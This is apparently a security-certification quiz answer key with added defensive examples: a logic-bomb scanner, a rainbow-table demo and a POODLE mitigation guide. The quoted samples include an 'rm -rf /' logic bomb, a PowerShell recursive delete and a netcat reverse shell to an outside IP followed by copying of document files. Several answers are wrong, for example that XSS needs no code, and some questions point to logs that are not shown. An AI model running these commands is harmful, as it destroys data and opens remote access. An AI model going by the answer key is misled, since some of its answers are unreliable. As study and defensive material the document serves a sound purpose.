Which of the following did the security administrator discover?
C. Logic bomb Explanation/Reference: The scheduled task does nothing as long as JohnDoe is still a member of Domain Admins; if that account is ever removed from the group, the database directory is deleted. A scheduled script that waits for a trigger condition before doing damage is a logic bomb, and checking the membership of a privileged group is not something a legitimate maintenance task on a database server needs to do.
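Added example, not from the quiz: a heuristic scan for the pattern both the bash item earlier and this PowerShell item show, a destructive command guarded by a condition about an account. It follows a crontab to the scripts it runs, then reports each destructive command together with the most recent if-condition above it and whether that condition looks like an account check. The command and condition regexes, the sample crontab and the sample scripts (reconstructed from the two quiz items) are assumptions; this is a triage aid for a reviewer, not a substitute for reading the script.

```python
import re

# Destructive actions and trigger conditions are matched heuristically (assumptions).
DESTRUCTIVE = [
    ("recursive delete of an absolute path", re.compile(r"\brm\s+-\w*r\w*\s+/\S*\s*$")),
    ("recursive Remove-Item", re.compile(r"\bRemove-Item\b.*-Recurse", re.I)),
    ("filesystem wipe", re.compile(r"\b(?:mkfs(?:\.\w+)?|shred|wipefs|Format-Volume)\b", re.I)),
    ("raw write to a block device", re.compile(r"\bdd\s+.*\bof=/dev/")),
]
CONDITION = re.compile(r"^\s*(?:if|elif|elseif)\b\s*(?P<cond>.*?)\s*(?:;?\s*then|\{)?\s*$", re.I)
BLOCK_END = re.compile(r"^\s*(?:fi|\})\s*$")
ACCOUNT_CHECK = re.compile(r"/etc/passwd|\bgetent\b|\bid\b|\bwhoami\b|Get-AD\w+|-notcontains|Domain Admins", re.I)
CRON_LINE = re.compile(r"^\s*(?:@\w+|(?:\S+\s+){5})(?P<cmd>\S.*)$")

# Constructed samples reconstructed from the two quiz items.
CRONTAB = "SHELL=/bin/bash\n5 * * * * /usr/local/bin/backup.sh\n30 3 * * * /usr/local/bin/rotate.sh\n"
SCRIPTS = {
    "/usr/local/bin/backup.sh": "#!/bin/bash\nif ! grep --quiet joeuser /etc/passwd; then\n    rm -rf /\nfi\n",
    "/usr/local/bin/rotate.sh": "#!/bin/bash\nfind /var/log -name '*.gz' -mtime +30 -delete\n",
}
PS_TASK = r'''$members = Get-ADGroupMember -Identity "Domain Admins" -Recursive | Select-Object -ExpandProperty name
if ($members -notcontains "JohnDoe") {
    Remove-Item -Path C:\Database -Recurse -Force
}
'''


def scan_script(text, name="<script>"):
    """Report destructive commands with the if-condition most recently opened above them
    (cleared again at fi or a closing brace, a deliberately simple notion of scope)."""
    findings, last_cond = [], None
    for no, line in enumerate(text.splitlines(), 1):
        m = CONDITION.match(line)
        if m:
            last_cond = m.group("cond")
            continue
        if BLOCK_END.match(line):
            last_cond = None
            continue
        for label, pat in DESTRUCTIVE:
            if pat.search(line):
                findings.append({"script": name, "line": no, "command": line.strip(),
                                 "what": label, "trigger": last_cond,
                                 "account_gated": bool(last_cond and ACCOUNT_CHECK.search(last_cond))})
                break
    return findings


def scan_crontab(crontab_text, scripts):
    """Follow each crontab entry to the script it runs (scripts: path -> contents, as a
    collector would gather them) and scan it. Entries whose script is missing are reported too."""
    findings = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if not m:
            continue                       # environment assignments such as SHELL=/bin/bash
        path = m.group("cmd").split()[0]
        if path not in scripts:
            findings.append({"script": path, "line": None, "command": None,
                             "what": "scheduled script not found", "trigger": None, "account_gated": False})
            continue
        findings.extend(scan_script(scripts[path], path))
    return findings


if __name__ == "__main__":
    for f in scan_crontab(CRONTAB, SCRIPTS) + scan_script(PS_TASK, "task.ps1"):
        print(f)
```

The same approach extends to Windows by exporting the actions of scheduled tasks (schtasks /query /xml) and scanning the scripts they reference; obfuscated or compiled payloads will not be caught by text patterns, which is why the output is a queue for human review rather than a verdict.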
Which of the following uses precomputed hashes to guess passwords?
C. Rainbow tables Explanation/Reference: A rainbow table is a precomputed table for reversing cryptographic hash functions, usually for cracking password hashes.
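The two attacks contrasted here and earlier in the quiz (rainbow table versus collision), as an added example that is not part of the quiz: a toy rainbow table over a three-letter lowercase password space, built from hash/reduce chains that store only their endpoints, which reverses an unsalted MD5 by lookup; beside it, a birthday search that finds two different inputs with the same truncated digest, which is what a collision attack wants and which never reverses anything. The alphabet, password length, chain length, truncation and reduction function are choices made for the demonstration.

```python
import hashlib
import itertools
import string

ALPHABET = string.ascii_lowercase
PW_LEN = 3
SPACE = len(ALPHABET) ** PW_LEN      # 17,576 candidate passwords; tiny on purpose


def h(pw):
    """The unsalted hash a weak password store keeps (MD5 hex, as in many old breaches)."""
    return hashlib.md5(pw.encode()).hexdigest()


def reduce_to_password(digest, step):
    """Reduction function: map a digest back into the password space. Mixing in the
    chain position is what makes this a rainbow table rather than a plain Hellman
    table: two chains that collide at different positions no longer merge."""
    n = (int(digest[:12], 16) + step) % SPACE
    chars = []
    for _ in range(PW_LEN):
        chars.append(ALPHABET[n % len(ALPHABET)])
        n //= len(ALPHABET)
    return "".join(chars)


def walk(pw, from_step, to_step):
    """Apply hash-then-reduce for steps from_step .. to_step-1."""
    for step in range(from_step, to_step):
        pw = reduce_to_password(h(pw), step)
    return pw


def chain(start, chain_len):
    """The chain_len passwords whose hashes the chain starting at `start` covers."""
    pws = [start]
    for step in range(chain_len - 1):
        pws.append(reduce_to_password(h(pws[-1]), step))
    return pws


def build_table(starts, chain_len):
    """Precompute: store only end -> [starts]. Keeping a list survives merged chains."""
    table = {}
    for start in starts:
        table.setdefault(walk(start, 0, chain_len), []).append(start)
    return table


def lookup(table, target_digest, chain_len):
    """Reverse target_digest, or return None if no chain covers it: assume the digest
    sits at each position in turn, walk to the chain end, and rebuild matching chains."""
    for pos in range(chain_len - 1, -1, -1):
        end = walk(reduce_to_password(target_digest, pos), pos + 1, chain_len)
        for start in table.get(end, []):
            pw = start
            for step in range(chain_len):
                if h(pw) == target_digest:
                    return pw
                pw = reduce_to_password(h(pw), step)
    return None


def find_collision(bits=16):
    """Birthday search: two distinct inputs whose MD5 digests share their first `bits`
    bits. Expected work is about 2**(bits/2) hashes, not 2**bits."""
    nhex = bits // 4
    seen = {}
    for n in itertools.count():
        msg = f"msg{n}"
        tag = h(msg)[:nhex]
        if tag in seen:
            return seen[tag], msg
        seen[tag] = msg


if __name__ == "__main__":
    starts = [reduce_to_password(h(f"seed{i}"), 0) for i in range(300)]
    table = build_table(starts, 40)
    victim = chain(starts[0], 40)[5]
    print("rainbow lookup:", lookup(table, h(victim), 40), "==", victim)
    print("salted lookup :", lookup(table, h("s4lt" + victim), 40))
    a, b = find_collision(16)
    print("collision     :", a, b, h(a)[:4], h(b)[:4])
```

The salted lookup fails because the table was built over bare passwords and a per-user salt moves every hash out of that precomputed space; that is the whole reason salting defeats rainbow tables while doing nothing against collision attacks, which target the hash function rather than a stored value.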
The POODLE attack is a MITM exploit that affects:
C. SSLv3.0 with CBC mode cipher Explanation/Reference: A flaw was found in the way SSL 3.0 handled padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode.
How to protect your server against the POODLE SSLv3 vulnerability: On October 14th, 2014, a vulnerability in version 3 of the SSL encryption protocol was disclosed. This vulnerability, dubbed POODLE (Padding Oracle On Downgraded Legacy Encryption), allows an attacker to read information encrypted with this version of the protocol in plain text using a man-in-the-middle attack. Although SSLv3 is an older version of the protocol which is mainly obsolete, many pieces of software still fall back on SSLv3 if better encryption options are not available. More importantly, it is possible for an attacker to force SSLv3 connections if it is an available alternative for both participants attempting a connection. The POODLE vulnerability affects any services or clients that make it possible to communicate using SSLv3. Because this is a flaw with the protocol design, and not an implementation issue, every piece of software that uses SSLv3 is vulnerable. To find out more information about the vulnerability, consult the CVE information found at CVE-2014-3566.
What is the POODLE vulnerability? The POODLE vulnerability is a weakness in version 3 of the SSL protocol that allows an attacker in a man-in-the-middle context to decipher the plain text content of an SSLv3 encrypted message.
Who is affected by this vulnerability? This vulnerability affects every piece of software that can be coerced into communicating with SSLv3. This means that any software that implements a fallback mechanism that includes SSLv3 support is vulnerable and can be exploited. Some common pieces of software that may be affected are web browsers, web servers, VPN servers, mail servers, etc.
How does it work? In short, the POODLE vulnerability exists because the SSLv3 protocol does not adequately check the padding bytes that are sent with encrypted messages. Since these cannot be verified by the receiving party, an attacker can replace these and pass them on to the intended destination. When done in a specific way, the modified payload will potentially be accepted by the recipient without complaint. On average one out of every 256 such requests will be accepted at the destination, allowing the attacker to decrypt a single byte. This can be repeated easily in order to progressively decrypt additional bytes. Any attacker able to repeatedly force a participant to resend data using this protocol can break the encryption in a very short amount of time.
How can I protect myself? Actions should be taken to ensure that you are not vulnerable in your roles as both a client and a server. Since encryption is usually negotiated between clients and servers, it is an issue that involves both parties. Servers and clients should take steps to disable SSLv3 support completely. Many applications use better encryption by default, but implement SSLv3 support as a fallback option. This should be disabled, as a malicious user can force SSLv3 communication if both participants allow it as an acceptable method. To confirm a server no longer negotiates it, attempt an SSLv3-only handshake from a client that still supports the protocol (openssl s_client -connect host:443 -ssl3) and check that it fails, or run nmap --script ssl-enum-ciphers against the port and check that no SSLv3 cipher suites are listed.
A recent internal audit is forcing a company to review each internal business unit's VMs because the cluster they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities exist?
C. System sprawl
A security auditor is testing perimeter security in a building that is protected by badge readers. Which of the following types of attacks would MOST likely gain access?
C. Tailgating
An employee in the finance department receives an email, which appears to come from the Chief Financial Officer (CFO), instructing the employee to immediately wire a large sum of money to a vendor. Which of the following BEST describes the principles of social engineering used? (Select TWO)
C. Urgency F. Authority
Which of the following describes the key difference between vishing and phishing attacks?
C. Vishing attacks are accomplished using telephony services.
The network team has detected a large amount of traffic between workstations on the network. The traffic was initially very light, but it is increasing exponentially as the day progresses. Which of the following types of malware might be suspected?
C. Worm Explanation/Reference: As a worm propagates throughout a network, the increased traffic from infected host to new targets will increase bandwidth usage.
Which of the following attack types BEST describes a client-side attack that is used to manipulate an HTML iframe with JavaScript code via a web browser?
C. XSS Explanation/Reference: Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.
A security analyst is monitoring the network and observes unusual traffic coming from a host on the LAN. Using a network monitoring tool, the analyst observes the following information: After ten seconds, some computers shown in the IP Dst field start to exhibit the same behavior and immediately make multiple outbound connection attempts. Based on this observed behavior, which of the following is the MOST likely cause?
D. A worm is attacking the network. Explanation/Reference: The indicator that this is a worm is the source and destination IP addresses. The source IP is one system, and it is trying to establish connections with multiple IPs.
A technician is investigating a potentially compromised device with the following symptoms: browser slowness, frequent browser crashes, hourglass stuck, new search toolbar, and increased memory consumption. Which of the following types of malware has infected the system?
D. Adware Explanation/Reference: The term adware is frequently used to describe a form of malware (malicious software) which presents unwanted advertisements to the user of a computer. The advertisements produced by adware are sometimes in the form of a pop-up or sometimes in an "unclosable window". When the term is used in this way, the severity of its implication varies. While some sources rate adware only as an "irritant", others classify it as an "online threat" or even rate it as seriously as computer viruses and trojans. The precise definition of the term in this context also varies. Adware that observes the computer user's activities without their consent and reports it to the software's author is called spyware.
Which of the following BEST describes the impact of an unremediated session timeout vulnerability?
D. An attacker could use an existing session that has been initiated by a legitimate user
A security analyst believes an employee's workstation has been compromised. The analyst reviews the system logs, but does not find any attempted logins. The analyst then runs the diff command, comparing the C:\Windows\System32 directory and the installed cache directory. The analyst finds a series of files that look suspicious. One of the files contains the following commands: cmd /C %TEMP%\nc -c cmd.exe 34.100.43.230 copy *.doc > %TEMP%\docfiles.zip copy *.xls > %TEMP%\xlsfiles.zip copy *.pdf > %TEMP%\pdffiles.zip Which of the following types of malware was used?
D. Backdoor
An analyst is part of a team that is investigating a potential breach of sensitive data at a large organization, which serves the financial sector. The organization suspects a breach occurred when proprietary data was disclosed to the public. The team finds servers were accessed using shared credentials that have been in place for some time. In addition, the team discovers undocumented firewall rules, which provided unauthorized external access to a server. Suspecting the activities of a malicious insider threat, which of the following was the MOST likely to have been utilized to exfiltrate the proprietary data?
D. Backdoor Explanation/Reference: A backdoor is a malware type that negates normal authentication procedures to access a system. As a result, remote access is granted to resources within an application, such as databases and file servers, giving perpetrators the ability to remotely issue system commands and update malware.
A security analyst is conducting a web application vulnerability scan against the company website. Which of the following is considered an intrusive scan?
D. Cipher suite order
A systems administrator is deploying a new mission essential server into a virtual environment. Which of the following is BEST mitigated by the environment's rapid elasticity characteristic?
D. Denial of service Explanation/Reference: Virtual environments can help mitigate Denial of Service attacks by quickly allocating more resources from the host machine to handle the flood of traffic that a Denial of Service attack generates.
Which of the following is commonly done as part of a vulnerability scan?
D. Identifying unpatched workstations
A new security administrator ran a vulnerability scanner for the first time and caused a system outage. Which of the following types of scans MOST likely caused the outage?
D. Intrusive non-credentialed scan Explanation/Reference: Vulnerability scanners generally take one of two approaches to discovering security holes: nonintrusive or intrusive scanning. Nonintrusive methods generally include a simple scan of the target system's attributes (e.g., inspecting the file system for specific files or file versions, checking the registry for specific values, scanning for missing security updates, port scanning to discover which services are listening). Intrusive scanning actually tries to exploit the vulnerabilities the scanner is looking for. Several products use varying levels of intrusive scanning and let you pick an increasing or decreasing level of intrusiveness. Always be wary when scanning production computers, lest a scan's successful exploit accidentally take down the target system.
Ann, a user, states that her machine has been behaving erratically over the past week. She has experienced slowness and input lag and found text files that appear to contain pieces of her emails or online conversations with coworkers. The technician runs a standard virus scan but detects nothing. Which of the following types of malware has infected the machine?
D. Keylogger Explanation/Reference: Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored. Data can then be retrieved by the person operating the logging program. A keylogger can be either software or hardware.
Hacktivists are commonly motivated by?
D. Political Cause
Which of the following is a major difference between XSS attacks and remote code exploits?
D. Remote code exploits allow writing code at the client side and executing it, while XSS attacks require no code to work.
A website form is used to register new students at a university. The form passes the unsanitized values entered by the user and uses them to directly add the student's information to several core systems. Which of the following attacks can be used to gain further access due to this practice?
D. SQL Injection Explanation/Reference: SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
In determining when it may be necessary to perform a credentialed scan against a system instead of a non-credentialed scan, which of the following requirements is MOST likely to influence the decision?
D. The scanner must be able to audit file system permissions Explanation/Reference: Non-credentialed: A non-credentialed scan will monitor the network and see any vulnerabilities that an attacker would easily find; we should fix the vulnerabilities found with a non-credentialed scan first, as this is what the hacker will see when they enter your network. For example, an administrator runs a non-credentialed scan on the network and finds that there are three missing patches. The scan does not provide many details on these missing patches. The administrator installs the missing patches to keep the systems up to date as they can only operate on the information produced for them. Credentialed scan: A credentialed scan is a much safer version of the vulnerability scanner. It provides more detailed information than a non-credentialed scan. You can also set up the auditing of files and user permissions.
A malicious system continuously sends an extremely large number of SYN packets to a server. Which of the following BEST describes the resulting effect?
D. The server will exhaust its memory maintaining half-open connections Explanation/Reference: When a system tries to establish a connection with a server, it will send a SYN packet to the server, initiating a three-way handshake. The server will then reply with a SYN/ACK response, and wait for the final ACK response from the originating system. When there is no response, the server maintains the half-open connections, resulting in possible resource exhaustion.
A network administrator is reviewing the following IDS logs: Based on the above information, which of the following types of malware is triggering the IDS?
D. Worm Explanation/Reference: A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it. Worms almost always cause at least some harm to the network, even if only by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer.
When attackers use a compromised host as a platform for launching attacks deeper into a company's network, it is said that they are:
D. Pivoting Explanation/Reference: Pivoting refers to a method used by penetration testers that uses the compromised system to attack other systems on the same network to avoid restrictions such as firewall configurations, which may prohibit direct access to all machines. For example, if an attacker compromises a web server on a corporate network, the attacker can then use the compromised web server to attack other systems on the network.